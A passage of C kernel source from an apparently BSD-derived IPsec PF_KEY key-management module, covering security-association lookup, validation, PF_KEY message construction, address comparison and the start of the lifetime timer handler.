SADB_SASTATE_DEAD) continue; if (key_cmpsaidx(&sah->saidx, saidx, CMP_REQID)) return sah; } return NULL; } /* * check not to be duplicated SPI. * NOTE: this function is too slow due to searching all SAD. * OUT: * NULL : not found * others : found, pointer to a SA. */ static struct secasvar * key_checkspidup(struct secasindex *saidx, u_int32_t spi) { struct secashead *sah; struct secasvar *sav; /* check address family */ if (saidx->src.sa.sa_family != saidx->dst.sa.sa_family) { ipseclog((LOG_DEBUG, "key_checkspidup: address family mismatched.\n")); return NULL; } /* check all SAD */ LIST_FOREACH(sah, &sahtree, chain) { if (!key_ismyaddr((struct sockaddr *)&sah->saidx.dst)) continue; sav = key_getsavbyspi(sah, spi); if (sav != NULL) return sav; } return NULL; } /* * search SAD litmited alive SA, protocol, SPI. * OUT: * NULL : not found * others : found, pointer to a SA. */ static struct secasvar * key_getsavbyspi(struct secashead *sah, u_int32_t spi) { struct secasvar *sav; u_int stateidx; /* search all status */ for (stateidx = 0; stateidx < NELEM(saorder_state_alive); stateidx++) { u_int state = saorder_state_alive[stateidx]; LIST_FOREACH(sav, &sah->savtree[state], chain) { /* sanity check */ if (sav->state != state) { ipseclog((LOG_DEBUG, "key_getsavbyspi: " "invalid sav->state (queue: %d SA: %d)\n", state, sav->state)); continue; } if (sav->spi == spi) return sav; } } return NULL; } /* * copy SA values from PF_KEY message except *SPI, SEQ, PID, STATE and TYPE*. * You must update these if need. * OUT: 0: success. * !0: failure. * * does not modify mbuf. does not free mbuf on error. */ static int key_setsaval(struct secasvar *sav, struct mbuf *m, const struct sadb_msghdr *mhp) { int error = 0; /* sanity check */ if (m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_setsaval: NULL pointer is passed.\n"); /* initialization */ sav->replay = NULL; sav->key_auth = NULL; sav->key_enc = NULL; sav->sched = NULL; sav->schedlen = 0; sav->iv = NULL; sav->lft_c = NULL; sav->lft_h = NULL; sav->lft_s = NULL; sav->tdb_xform = NULL; /* transform */ sav->tdb_encalgxform = NULL; /* encoding algorithm */ sav->tdb_authalgxform = NULL; /* authentication algorithm */ sav->tdb_compalgxform = NULL; /* compression algorithm */ /* SA */ if (mhp->ext[SADB_EXT_SA] != NULL) { const struct sadb_sa *sa0; sa0 = (const struct sadb_sa *)mhp->ext[SADB_EXT_SA]; if (mhp->extlen[SADB_EXT_SA] < sizeof(*sa0)) { error = EINVAL; goto fail; } sav->alg_auth = sa0->sadb_sa_auth; sav->alg_enc = sa0->sadb_sa_encrypt; sav->flags = sa0->sadb_sa_flags; /* replay window */ if ((sa0->sadb_sa_flags & SADB_X_EXT_OLD) == 0) { sav->replay = kmalloc(sizeof(struct secreplay)+sa0->sadb_sa_replay, M_SECA, M_INTWAIT | M_ZERO | M_NULLOK); if (sav->replay == NULL) { ipseclog((LOG_DEBUG, "key_setsaval: No more memory.\n")); error = ENOBUFS; goto fail; } if (sa0->sadb_sa_replay != 0) sav->replay->bitmap = (caddr_t)(sav->replay+1); sav->replay->wsize = sa0->sadb_sa_replay; } } /* Authentication keys */ if (mhp->ext[SADB_EXT_KEY_AUTH] != NULL) { const struct sadb_key *key0; int len; key0 = (const struct sadb_key *)mhp->ext[SADB_EXT_KEY_AUTH]; len = mhp->extlen[SADB_EXT_KEY_AUTH]; error = 0; if (len < sizeof(*key0)) { error = EINVAL; goto fail; } switch (mhp->msg->sadb_msg_satype) { case SADB_SATYPE_AH: case SADB_SATYPE_ESP: if (len == PFKEY_ALIGN8(sizeof(struct sadb_key)) && sav->alg_auth != SADB_X_AALG_NULL) error = EINVAL; break; case SADB_X_SATYPE_IPCOMP: default: error = EINVAL; break; } if (error) { ipseclog((LOG_DEBUG, "key_setsaval: invalid key_auth values.\n")); goto fail; } sav->key_auth = (struct sadb_key *)key_newbuf(key0, len); if (sav->key_auth == NULL) { ipseclog((LOG_DEBUG, "key_setsaval: No more memory.\n")); error = ENOBUFS; goto fail; } } /* Encryption key */ if (mhp->ext[SADB_EXT_KEY_ENCRYPT] != NULL) { const struct sadb_key *key0; int len; key0 = (const struct sadb_key *)mhp->ext[SADB_EXT_KEY_ENCRYPT]; len = mhp->extlen[SADB_EXT_KEY_ENCRYPT]; error = 0; if (len < sizeof(*key0)) { error = EINVAL; goto fail; } switch (mhp->msg->sadb_msg_satype) { case SADB_SATYPE_ESP: if (len == PFKEY_ALIGN8(sizeof(struct sadb_key)) && sav->alg_enc != SADB_EALG_NULL) { error = EINVAL; break; } sav->key_enc = (struct sadb_key *)key_newbuf(key0, len); if (sav->key_enc == NULL) { ipseclog((LOG_DEBUG, "key_setsaval: No more memory.\n")); error = ENOBUFS; goto fail; } break; case SADB_X_SATYPE_IPCOMP: if (len != PFKEY_ALIGN8(sizeof(struct sadb_key))) error = EINVAL; sav->key_enc = NULL; /*just in case*/ break; case SADB_SATYPE_AH: default: error = EINVAL; break; } if (error) { ipseclog((LOG_DEBUG, "key_setsatval: invalid key_enc value.\n")); goto fail; } } /* set iv */ sav->ivlen = 0; switch (mhp->msg->sadb_msg_satype) { case SADB_SATYPE_AH: error = xform_init(sav, XF_AH); break; case SADB_SATYPE_ESP: error = xform_init(sav, XF_ESP); break; case SADB_X_SATYPE_IPCOMP: error = xform_init(sav, XF_IPCOMP); break; } if (error) { ipseclog((LOG_DEBUG, "key_setsaval: unable to initialize SA type %u.\n", mhp->msg->sadb_msg_satype)); goto fail; } /* reset created */ sav->created = time_second; /* make lifetime for CURRENT */ KMALLOC(sav->lft_c, struct sadb_lifetime *, sizeof(struct sadb_lifetime)); if (sav->lft_c == NULL) { ipseclog((LOG_DEBUG, "key_setsaval: No more memory.\n")); error = ENOBUFS; goto fail; } sav->lft_c->sadb_lifetime_len = PFKEY_UNIT64(sizeof(struct sadb_lifetime)); sav->lft_c->sadb_lifetime_exttype = SADB_EXT_LIFETIME_CURRENT; sav->lft_c->sadb_lifetime_allocations = 0; sav->lft_c->sadb_lifetime_bytes = 0; sav->lft_c->sadb_lifetime_addtime = time_second; sav->lft_c->sadb_lifetime_usetime = 0; /* lifetimes for HARD and SOFT */ { const struct sadb_lifetime *lft0; lft0 = (struct sadb_lifetime *)mhp->ext[SADB_EXT_LIFETIME_HARD]; if (lft0 != NULL) { if (mhp->extlen[SADB_EXT_LIFETIME_HARD] < sizeof(*lft0)) { error = EINVAL; goto fail; } sav->lft_h = (struct sadb_lifetime *)key_newbuf(lft0, sizeof(*lft0)); if (sav->lft_h == NULL) { ipseclog((LOG_DEBUG, "key_setsaval: No more memory.\n")); error = ENOBUFS; goto fail; } /* to be initialize ? */ } lft0 = (struct sadb_lifetime *)mhp->ext[SADB_EXT_LIFETIME_SOFT]; if (lft0 != NULL) { if (mhp->extlen[SADB_EXT_LIFETIME_SOFT] < sizeof(*lft0)) { error = EINVAL; goto fail; } sav->lft_s = (struct sadb_lifetime *)key_newbuf(lft0, sizeof(*lft0)); if (sav->lft_s == NULL) { ipseclog((LOG_DEBUG, "key_setsaval: No more memory.\n")); error = ENOBUFS; goto fail; } /* to be initialize ? */ } } return 0; fail: /* initialization */ if (sav->replay != NULL) { KFREE(sav->replay); sav->replay = NULL; } if (sav->key_auth != NULL) { KFREE(sav->key_auth); sav->key_auth = NULL; } if (sav->key_enc != NULL) { KFREE(sav->key_enc); sav->key_enc = NULL; } if (sav->sched) { KFREE(sav->sched); sav->sched = NULL; } if (sav->iv != NULL) { KFREE(sav->iv); sav->iv = NULL; } if (sav->lft_c != NULL) { KFREE(sav->lft_c); sav->lft_c = NULL; } if (sav->lft_h != NULL) { KFREE(sav->lft_h); sav->lft_h = NULL; } if (sav->lft_s != NULL) { KFREE(sav->lft_s); sav->lft_s = NULL; } return error; } /* * validation with a secasvar entry, and set SADB_SATYPE_MATURE. * OUT: 0: valid * other: errno */ static int key_mature(struct secasvar *sav) { int error; /* check SPI value */ switch (sav->sah->saidx.proto) { case IPPROTO_ESP: case IPPROTO_AH: if (ntohl(sav->spi) >= 0 && ntohl(sav->spi) <= 255) { ipseclog((LOG_DEBUG, "key_mature: illegal range of SPI %u.\n", (u_int32_t)ntohl(sav->spi))); return EINVAL; } break; } /* check satype */ switch (sav->sah->saidx.proto) { case IPPROTO_ESP: /* check flags */ if ((sav->flags & (SADB_X_EXT_OLD|SADB_X_EXT_DERIV)) == (SADB_X_EXT_OLD|SADB_X_EXT_DERIV)) { ipseclog((LOG_DEBUG, "key_mature: " "invalid flag (derived) given to old-esp.\n")); return EINVAL; } error = xform_init(sav, XF_ESP); break; case IPPROTO_AH: /* check flags */ if (sav->flags & SADB_X_EXT_DERIV) { ipseclog((LOG_DEBUG, "key_mature: " "invalid flag (derived) given to AH SA.\n")); return EINVAL; } if (sav->alg_enc != SADB_EALG_NONE) { ipseclog((LOG_DEBUG, "key_mature: " "protocol and algorithm mismated.\n")); return(EINVAL); } error = xform_init(sav, XF_AH); break; case IPPROTO_IPCOMP: if (sav->alg_auth != SADB_AALG_NONE) { ipseclog((LOG_DEBUG, "key_mature: " "protocol and algorithm mismated.\n")); return(EINVAL); } if ((sav->flags & SADB_X_EXT_RAWCPI) == 0 && ntohl(sav->spi) >= 0x10000) { ipseclog((LOG_DEBUG, "key_mature: invalid cpi for IPComp.\n")); return(EINVAL); } error = xform_init(sav, XF_IPCOMP); break; default: ipseclog((LOG_DEBUG, "key_mature: Invalid satype.\n")); error = EPROTONOSUPPORT; break; } if (error == 0) key_sa_chgstate(sav, SADB_SASTATE_MATURE); return (error); } /* * subroutine for SADB_GET and SADB_DUMP. */ static struct mbuf * key_setdumpsa(struct secasvar *sav, u_int8_t type, u_int8_t satype, u_int32_t seq, u_int32_t pid) { struct mbuf *result = NULL, *tres = NULL, *m; int l = 0; int i; void *p; int dumporder[] = { SADB_EXT_SA, SADB_X_EXT_SA2, SADB_EXT_LIFETIME_HARD, SADB_EXT_LIFETIME_SOFT, SADB_EXT_LIFETIME_CURRENT, SADB_EXT_ADDRESS_SRC, SADB_EXT_ADDRESS_DST, SADB_EXT_ADDRESS_PROXY, SADB_EXT_KEY_AUTH, SADB_EXT_KEY_ENCRYPT, SADB_EXT_IDENTITY_SRC, SADB_EXT_IDENTITY_DST, SADB_EXT_SENSITIVITY, }; m = key_setsadbmsg(type, 0, satype, seq, pid, sav->refcnt); if (m == NULL) goto fail; result = m; for (i = NELEM(dumporder) - 1; i >= 0; i--) { m = NULL; p = NULL; switch (dumporder[i]) { case SADB_EXT_SA: m = key_setsadbsa(sav); if (!m) goto fail; break; case SADB_X_EXT_SA2: m = key_setsadbxsa2(sav->sah->saidx.mode, sav->replay ? sav->replay->count : 0, sav->sah->saidx.reqid); if (!m) goto fail; break; case SADB_EXT_ADDRESS_SRC: m = key_setsadbaddr(SADB_EXT_ADDRESS_SRC, &sav->sah->saidx.src.sa, FULLMASK, IPSEC_ULPROTO_ANY); if (!m) goto fail; break; case SADB_EXT_ADDRESS_DST: m = key_setsadbaddr(SADB_EXT_ADDRESS_DST, &sav->sah->saidx.dst.sa, FULLMASK, IPSEC_ULPROTO_ANY); if (!m) goto fail; break; case SADB_EXT_KEY_AUTH: if (!sav->key_auth) continue; l = PFKEY_UNUNIT64(sav->key_auth->sadb_key_len); p = sav->key_auth; break; case SADB_EXT_KEY_ENCRYPT: if (!sav->key_enc) continue; l = PFKEY_UNUNIT64(sav->key_enc->sadb_key_len); p = sav->key_enc; break; case SADB_EXT_LIFETIME_CURRENT: if (!sav->lft_c) continue; l = PFKEY_UNUNIT64(((struct sadb_ext *)sav->lft_c)->sadb_ext_len); p = sav->lft_c; break; case SADB_EXT_LIFETIME_HARD: if (!sav->lft_h) continue; l = PFKEY_UNUNIT64(((struct sadb_ext *)sav->lft_h)->sadb_ext_len); p = sav->lft_h; break; case SADB_EXT_LIFETIME_SOFT: if (!sav->lft_s) continue; l = PFKEY_UNUNIT64(((struct sadb_ext *)sav->lft_s)->sadb_ext_len); p = sav->lft_s; break; case SADB_EXT_ADDRESS_PROXY: case SADB_EXT_IDENTITY_SRC: case SADB_EXT_IDENTITY_DST: /* XXX: should we brought from SPD ? */ case SADB_EXT_SENSITIVITY: default: continue; } if ((!m && !p) || (m && p)) goto fail; if (p && tres) { M_PREPEND(tres, l, MB_DONTWAIT); if (!tres) goto fail; bcopy(p, mtod(tres, caddr_t), l); continue; } if (p) { m = key_alloc_mbuf(l); if (!m) goto fail; m_copyback(m, 0, l, p); } if (tres) m_cat(m, tres); tres = m; } m_cat(result, tres); if (result->m_len < sizeof(struct sadb_msg)) { result = m_pullup(result, sizeof(struct sadb_msg)); if (result == NULL) goto fail; } result->m_pkthdr.len = m_lengthm(result, NULL); mtod(result, struct sadb_msg *)->sadb_msg_len = PFKEY_UNIT64(result->m_pkthdr.len); return result; fail: m_freem(result); m_freem(tres); return NULL; } /* * set data into sadb_msg. */ static struct mbuf * key_setsadbmsg(u_int8_t type, u_int16_t tlen, u_int8_t satype, u_int32_t seq, pid_t pid, u_int16_t reserved) { struct mbuf *m; struct sadb_msg *p; int len; len = PFKEY_ALIGN8(sizeof(struct sadb_msg)); if (len > MCLBYTES) return NULL; m = m_getb(len, MB_DONTWAIT, MT_DATA, M_PKTHDR); if (!m) return NULL; m->m_pkthdr.len = m->m_len = len; p = mtod(m, struct sadb_msg *); bzero(p, len); p->sadb_msg_version = PF_KEY_V2; p->sadb_msg_type = type; p->sadb_msg_errno = 0; p->sadb_msg_satype = satype; p->sadb_msg_len = PFKEY_UNIT64(tlen); p->sadb_msg_reserved = reserved; p->sadb_msg_seq = seq; p->sadb_msg_pid = (u_int32_t)pid; return m; } /* * copy secasvar data into sadb_address. */ static struct mbuf * key_setsadbsa(struct secasvar *sav) { struct mbuf *m; struct sadb_sa *p; int len; len = PFKEY_ALIGN8(sizeof(struct sadb_sa)); m = key_alloc_mbuf(len); if (!m || m->m_next) { /*XXX*/ if (m) m_freem(m); return NULL; } p = mtod(m, struct sadb_sa *); bzero(p, len); p->sadb_sa_len = PFKEY_UNIT64(len); p->sadb_sa_exttype = SADB_EXT_SA; p->sadb_sa_spi = sav->spi; p->sadb_sa_replay = (sav->replay != NULL ? sav->replay->wsize : 0); p->sadb_sa_state = sav->state; p->sadb_sa_auth = sav->alg_auth; p->sadb_sa_encrypt = sav->alg_enc; p->sadb_sa_flags = sav->flags; return m; } /* * set data into sadb_address. */ static struct mbuf * key_setsadbaddr(u_int16_t exttype, const struct sockaddr *saddr, u_int8_t prefixlen, u_int16_t ul_proto) { struct mbuf *m; struct sadb_address *p; size_t len; len = PFKEY_ALIGN8(sizeof(struct sadb_address)) + PFKEY_ALIGN8(saddr->sa_len); m = key_alloc_mbuf(len); if (!m || m->m_next) { /*XXX*/ if (m) m_freem(m); return NULL; } p = mtod(m, struct sadb_address *); bzero(p, len); p->sadb_address_len = PFKEY_UNIT64(len); p->sadb_address_exttype = exttype; p->sadb_address_proto = ul_proto; if (prefixlen == FULLMASK) { switch (saddr->sa_family) { case AF_INET: prefixlen = sizeof(struct in_addr) << 3; break; case AF_INET6: prefixlen = sizeof(struct in6_addr) << 3; break; default: ; /*XXX*/ } } p->sadb_address_prefixlen = prefixlen; p->sadb_address_reserved = 0; bcopy(saddr, mtod(m, caddr_t) + PFKEY_ALIGN8(sizeof(struct sadb_address)), saddr->sa_len); return m; } #if 0 /* * set data into sadb_ident. */ static struct mbuf * key_setsadbident(u_int16_t exttype, u_int16_t idtype, caddr_t string, int stringlen, u_int64_t id) { struct mbuf *m; struct sadb_ident *p; size_t len; len = PFKEY_ALIGN8(sizeof(struct sadb_ident)) + PFKEY_ALIGN8(stringlen); m = key_alloc_mbuf(len); if (!m || m->m_next) { /*XXX*/ if (m) m_freem(m); return NULL; } p = mtod(m, struct sadb_ident *); bzero(p, len); p->sadb_ident_len = PFKEY_UNIT64(len); p->sadb_ident_exttype = exttype; p->sadb_ident_type = idtype; p->sadb_ident_reserved = 0; p->sadb_ident_id = id; bcopy(string, mtod(m, caddr_t) + PFKEY_ALIGN8(sizeof(struct sadb_ident)), stringlen); return m; } #endif /* * set data into sadb_x_sa2. */ static struct mbuf * key_setsadbxsa2(u_int8_t mode, u_int32_t seq, u_int32_t reqid) { struct mbuf *m; struct sadb_x_sa2 *p; size_t len; len = PFKEY_ALIGN8(sizeof(struct sadb_x_sa2)); m = key_alloc_mbuf(len); if (!m || m->m_next) { /*XXX*/ if (m) m_freem(m); return NULL; } p = mtod(m, struct sadb_x_sa2 *); bzero(p, len); p->sadb_x_sa2_len = PFKEY_UNIT64(len); p->sadb_x_sa2_exttype = SADB_X_EXT_SA2; p->sadb_x_sa2_mode = mode; p->sadb_x_sa2_reserved1 = 0; p->sadb_x_sa2_reserved2 = 0; p->sadb_x_sa2_sequence = seq; p->sadb_x_sa2_reqid = reqid; return m; } /* * set data into sadb_x_policy */ static struct mbuf * key_setsadbxpolicy(u_int16_t type, u_int8_t dir, u_int32_t id) { struct mbuf *m; struct sadb_x_policy *p; size_t len; len = PFKEY_ALIGN8(sizeof(struct sadb_x_policy)); m = key_alloc_mbuf(len); if (!m || m->m_next) { /*XXX*/ if (m) m_freem(m); return NULL; } p = mtod(m, struct sadb_x_policy *); bzero(p, len); p->sadb_x_policy_len = PFKEY_UNIT64(len); p->sadb_x_policy_exttype = SADB_X_EXT_POLICY; p->sadb_x_policy_type = type; p->sadb_x_policy_dir = dir; p->sadb_x_policy_id = id; return m; } /* %%% utilities */ /* * copy a buffer into the new buffer allocated. */ static void * key_newbuf(const void *src, u_int len) { caddr_t new; KMALLOC(new, caddr_t, len); if (new == NULL) { ipseclog((LOG_DEBUG, "key_newbuf: No more memory.\n")); return NULL; } bcopy(src, new, len); return new; } /* compare my own address * OUT: 1: true, i.e. my address. * 0: false */ int key_ismyaddr(struct sockaddr *sa) { #ifdef INET struct sockaddr_in *sin; struct in_ifaddr_container *iac; #endif /* sanity check */ if (sa == NULL) panic("key_ismyaddr: NULL pointer is passed.\n"); switch (sa->sa_family) { #ifdef INET case AF_INET: sin = (struct sockaddr_in *)sa; TAILQ_FOREACH(iac, &in_ifaddrheads[mycpuid], ia_link) { struct in_ifaddr *ia = iac->ia; if (sin->sin_family == ia->ia_addr.sin_family && sin->sin_len == ia->ia_addr.sin_len && sin->sin_addr.s_addr == ia->ia_addr.sin_addr.s_addr) { return 1; } } break; #endif #ifdef INET6 case AF_INET6: return key_ismyaddr6((struct sockaddr_in6 *)sa); #endif } return 0; } #ifdef INET6 /* * compare my own address for IPv6. * 1: ours * 0: other * NOTE: derived ip6_input() in KAME. This is necessary to modify more. */ #include <netinet6/in6_var.h> static int key_ismyaddr6(struct sockaddr_in6 *sin6) { struct in6_ifaddr *ia; struct in6_multi *in6m; for (ia = in6_ifaddr; ia; ia = ia->ia_next) { if (key_sockaddrcmp((struct sockaddr *)&sin6, (struct sockaddr *)&ia->ia_addr, 0) == 0) return 1; /* * XXX Multicast * XXX why do we care about multlicast here while we don't care * about IPv4 multicast?? * XXX scope */ in6m = NULL; IN6_LOOKUP_MULTI(sin6->sin6_addr, ia->ia_ifp, in6m); if (in6m) return 1; } /* loopback, just for safety */ if (IN6_IS_ADDR_LOOPBACK(&sin6->sin6_addr)) return 1; return 0; } #endif /*INET6*/ /* * compare two secasindex structure. * flag can specify to compare 2 saidxes. * compare two secasindex structure without both mode and reqid. * don't compare port. * IN: * saidx0: source, it can be in SAD. * saidx1: object. * OUT: * 1 : equal * 0 : not equal */ static int key_cmpsaidx( const struct secasindex *saidx0, const struct secasindex *saidx1, int flag) { /* sanity */ if (saidx0 == NULL && saidx1 == NULL) return 1; if (saidx0 == NULL || saidx1 == NULL) return 0; if (saidx0->proto != saidx1->proto) return 0; if (flag == CMP_EXACTLY) { if (saidx0->mode != saidx1->mode) return 0; if (saidx0->reqid != saidx1->reqid) return 0; if (bcmp(&saidx0->src, &saidx1->src, saidx0->src.sa.sa_len) != 0 || bcmp(&saidx0->dst, &saidx1->dst, saidx0->dst.sa.sa_len) != 0) return 0; } else { /* CMP_MODE_REQID, CMP_REQID, CMP_HEAD */ if (flag == CMP_MODE_REQID ||flag == CMP_REQID) { /* * If reqid of SPD is non-zero, unique SA is required. * The result must be of same reqid in this case. */ if (saidx1->reqid != 0 && saidx0->reqid != saidx1->reqid) return 0; } if (flag == CMP_MODE_REQID) { if (saidx0->mode != IPSEC_MODE_ANY && saidx0->mode != saidx1->mode) return 0; } if (key_sockaddrcmp(&saidx0->src.sa, &saidx1->src.sa, 0) != 0) { return 0; } if (key_sockaddrcmp(&saidx0->dst.sa, &saidx1->dst.sa, 0) != 0) { return 0; } } return 1; } /* * compare two secindex structure exactly. * IN: * spidx0: source, it is often in SPD. * spidx1: object, it is often from PFKEY message. * OUT: * 1 : equal * 0 : not equal */ static int key_cmpspidx_exactly( struct secpolicyindex *spidx0, struct secpolicyindex *spidx1) { /* sanity */ if (spidx0 == NULL && spidx1 == NULL) return 1; if (spidx0 == NULL || spidx1 == NULL) return 0; if (spidx0->prefs != spidx1->prefs || spidx0->prefd != spidx1->prefd || spidx0->ul_proto != spidx1->ul_proto) return 0; return key_sockaddrcmp(&spidx0->src.sa, &spidx1->src.sa, 1) == 0 && key_sockaddrcmp(&spidx0->dst.sa, &spidx1->dst.sa, 1) == 0; } /* * compare two secindex structure with mask. * IN: * spidx0: source, it is often in SPD. * spidx1: object, it is often from IP header. * OUT: * 1 : equal * 0 : not equal */ static int key_cmpspidx_withmask( struct secpolicyindex *spidx0, struct secpolicyindex *spidx1) { /* sanity */ if (spidx0 == NULL && spidx1 == NULL) return 1; if (spidx0 == NULL || spidx1 == NULL) return 0; if (spidx0->src.sa.sa_family != spidx1->src.sa.sa_family || spidx0->dst.sa.sa_family != spidx1->dst.sa.sa_family || spidx0->src.sa.sa_len != spidx1->src.sa.sa_len || spidx0->dst.sa.sa_len != spidx1->dst.sa.sa_len) return 0; /* if spidx.ul_proto == IPSEC_ULPROTO_ANY, ignore. */ if (spidx0->ul_proto != (u_int16_t)IPSEC_ULPROTO_ANY && spidx0->ul_proto != spidx1->ul_proto) return 0; switch (spidx0->src.sa.sa_family) { case AF_INET: if (spidx0->src.sin.sin_port != IPSEC_PORT_ANY && spidx0->src.sin.sin_port != spidx1->src.sin.sin_port) return 0; if (!key_bbcmp(&spidx0->src.sin.sin_addr, &spidx1->src.sin.sin_addr, spidx0->prefs)) return 0; break; case AF_INET6: if (spidx0->src.sin6.sin6_port != IPSEC_PORT_ANY && spidx0->src.sin6.sin6_port != spidx1->src.sin6.sin6_port) return 0; /* * scope_id check. if sin6_scope_id is 0, we regard it * as a wildcard scope, which matches any scope zone ID. */ if (spidx0->src.sin6.sin6_scope_id && spidx1->src.sin6.sin6_scope_id && spidx0->src.sin6.sin6_scope_id != spidx1->src.sin6.sin6_scope_id) return 0; if (!key_bbcmp(&spidx0->src.sin6.sin6_addr, &spidx1->src.sin6.sin6_addr, spidx0->prefs)) return 0; break; default: /* XXX */ if (bcmp(&spidx0->src, &spidx1->src, spidx0->src.sa.sa_len) != 0) return 0; break; } switch (spidx0->dst.sa.sa_family) { case AF_INET: if (spidx0->dst.sin.sin_port != IPSEC_PORT_ANY && spidx0->dst.sin.sin_port != spidx1->dst.sin.sin_port) return 0; if (!key_bbcmp(&spidx0->dst.sin.sin_addr, &spidx1->dst.sin.sin_addr, spidx0->prefd)) return 0; break; case AF_INET6: if (spidx0->dst.sin6.sin6_port != IPSEC_PORT_ANY && spidx0->dst.sin6.sin6_port != spidx1->dst.sin6.sin6_port) return 0; /* * scope_id check. if sin6_scope_id is 0, we regard it * as a wildcard scope, which matches any scope zone ID. */ if (spidx0->dst.sin6.sin6_scope_id && spidx1->dst.sin6.sin6_scope_id && spidx0->dst.sin6.sin6_scope_id != spidx1->dst.sin6.sin6_scope_id) return 0; if (!key_bbcmp(&spidx0->dst.sin6.sin6_addr, &spidx1->dst.sin6.sin6_addr, spidx0->prefd)) return 0; break; default: /* XXX */ if (bcmp(&spidx0->dst, &spidx1->dst, spidx0->dst.sa.sa_len) != 0) return 0; break; } /* XXX Do we check other field ? e.g. flowinfo */ return 1; } /* returns 0 on match */ static int key_sockaddrcmp( const struct sockaddr *sa1, const struct sockaddr *sa2, int port) { #ifdef satosin #undef satosin #endif #define satosin(s) ((const struct sockaddr_in *)s) #ifdef satosin6 #undef satosin6 #endif #define satosin6(s) ((const struct sockaddr_in6 *)s) if (sa1->sa_family != sa2->sa_family || sa1->sa_len != sa2->sa_len) return 1; switch (sa1->sa_family) { case AF_INET: if (sa1->sa_len != sizeof(struct sockaddr_in)) return 1; if (satosin(sa1)->sin_addr.s_addr != satosin(sa2)->sin_addr.s_addr) { return 1; } if (port && satosin(sa1)->sin_port != satosin(sa2)->sin_port) return 1; break; case AF_INET6: if (sa1->sa_len != sizeof(struct sockaddr_in6)) return 1; /*EINVAL*/ if (satosin6(sa1)->sin6_scope_id != satosin6(sa2)->sin6_scope_id) { return 1; } if (!IN6_ARE_ADDR_EQUAL(&satosin6(sa1)->sin6_addr, &satosin6(sa2)->sin6_addr)) { return 1; } if (port && satosin6(sa1)->sin6_port != satosin6(sa2)->sin6_port) { return 1; } default: if (bcmp(sa1, sa2, sa1->sa_len) != 0) return 1; break; } return 0; #undef satosin #undef satosin6 } /* * compare two buffers with mask. * IN: * addr1: source * addr2: object * bits: Number of bits to compare * OUT: * 1 : equal * 0 : not equal */ static int key_bbcmp(const void *a1, const void *a2, u_int bits) { const unsigned char *p1 = a1; const unsigned char *p2 = a2; /* XXX: This could be considerably faster if we compare a word * at a time, but it is complicated on LSB Endian machines */ /* Handle null pointers */ if (p1 == NULL || p2 == NULL) return (p1 == p2); while (bits >= 8) { if (*p1++ != *p2++) return 0; bits -= 8; } if (bits > 0) { u_int8_t mask = ~((1<<(8-bits))-1); if ((*p1 & mask) != (*p2 & mask)) return 0; } return 1; /* Match! */ } /* * time handler. * scanning SPD and SAD to check status for each entries, * and do to remove or to expire. * XXX: year 2038 problem may remain. */ void key_timehandler(void *unused) { u_int dir; time_t now = time_second; struct secspacq *spacq, *nextspacq; crit_enter(); /* SPD */ { struct secpolicy *sp, *nextsp; for (dir = 0; dir < IPSEC_DIR_MAX; dir++) { LIST_FOREACH_MUTABLE(sp, &sptree[dir], chain, nextsp) { if (sp->state == IPSEC_SPSTATE_DEAD) { KEY_FREESP(&sp); continue; } if (sp->lifetime == 0 && sp->validtime == 0) continue; /* the deletion will occur next time */ if ((sp->lifetime && now - sp->created > sp->lifetime) || (sp->validtime && now - sp->lastused > sp->validtime)) { sp->state = IPSEC_SPSTATE_DEAD; key_spdexpire(sp); continue; } } } } /* SAD */ { struct secashead *sah, *nextsah; struct secasvar *sav, *nextsav; LIST_FOREACH_MUTABLE(sah, &sahtree, chain, nextsah) { /* if sah has been dead, then delete it and process next sah. */ if (sah->state == SADB_SASTATE_DEAD) { key_delsah(sah); continue; } /* if LARVAL entry doesn't become MATURE, delete it. */ LIST_FOREACH_MUTABLE(sav, &sah->savtree[SADB_SASTATE_LARVAL], chain, nextsav) { if (now - sav->created > key_larval_lifetime) { KEY_FREESAV(&sav); } } /* * check MATURE entry to start to send expire message * whether or not. */ LIST_FOREACH_MUTABLE(sav, &sah->savtree[SADB_SASTATE_MATURE], chain, nextsav) { /* we don't need to check. */ if (sav->lft_s == NULL) continue; /* sanity check */ if (sav->lft_c == NULL) { ipseclog((LOG_DEBUG,"key_timehandler: " "There is no CURRENT time, why?\n")); continue; } /* check SOFT lifetime */ if (sav->lft_s->sadb_lifetime_addtime != 0 && now - sav->created > sav->lft_s->sadb_lifetime_addtime) { /* * check SA to be used whether or not. * when SA hasn't been used, delete it. */ if (sav->lft_c->sadb_lifetime_usetime == 0) { key_sa_chgstate(sav, SADB_SASTATE_DEAD); KEY_FREESAV(&sav); } else { key_sa_chgstate(sav, SADB_SASTATE_DYING); /* * XXX If we keep to send expire * message in the status of * DYING. Do remove below code. */ key_expire(sav); } } /* check SOFT lifetime by bytes */ /* * XXX I don't know the way to delete this SA * when new SA is installed. Caution when it's * installed too big lifetime by time. */ else if (sav->lft_s->sadb_lifetime_bytes != 0 && sav->lft_s->sadb_lifetime_bytes < sav->lft_c->sadb_lifetime_bytes) { key_sa_chgstate(sav, SADB_SASTATE_DYING); /* * XXX If we keep to send expire * message in the status of * DYING. Do remove below code. */ key_expire(sav); } } /* check DYING entry to change status to DEAD. */ LIST_FOREACH_MUTABLE(sav, &sah->savtree[SADB_SASTATE_DYING], chain, nextsav) { /* we don't need to check. */ if (sav->lft_h == NULL) continue; /* sanity check */ if (sav->lft_c == NULL) { ipseclog((LOG_DEBUG, "key_timehandler: " "There is no CURRENT time, why?\n")); continue; } if (sav->lft_h->sadb_lifetime_addtime != 0 && now - sav->created > sav->lft_h->sadb_lifetime_addtime) { key_sa_chgstate(sav, SADB_SASTATE_DEAD); KEY_FREESAV(&sav); } #if 0 /* XXX Should we keep to send expire message until HARD lifetime ? */ else if (sav->lft_s != NULL && sav->lft_s->sadb_lifetime_addtime != 0 && now - sav->created > sav->lft_s->sadb_lifetime_addtime) { /* * XXX: should be checked to be * installed the valid SA. */ /* * If there is no SA then sending * expire message. */ key_expire(sav); } #endif /* check HARD lifetime by bytes */ else if (sav->lft_h->sadb_lifetime_bytes != 0 && sav->lft_h->sadb_lifetime_bytes < sav->lft_c->sadb_lifetime_bytes) { key_sa_chgstate(sav, SADB_SASTATE_DEAD); KEY_FREESAV(&sav); } } /* delete entry in DEAD */ LIST_FOREACH_MUTABLE(sav, &sah->savtree[SADB_SASTATE_DEAD], chain, nextsav) { /* sanity check */ if (sav->state != SADB_SASTATE_DEAD) { ipseclog((LOG_DEBUG, "key_timehandler: " "invalid sav->state " "(queue: %d SA: %d): " "kill it anyway\n", SADB_SASTATE_DEAD, sav->state)); } /* * do not call key_freesav() here. * sav should already be freed, and 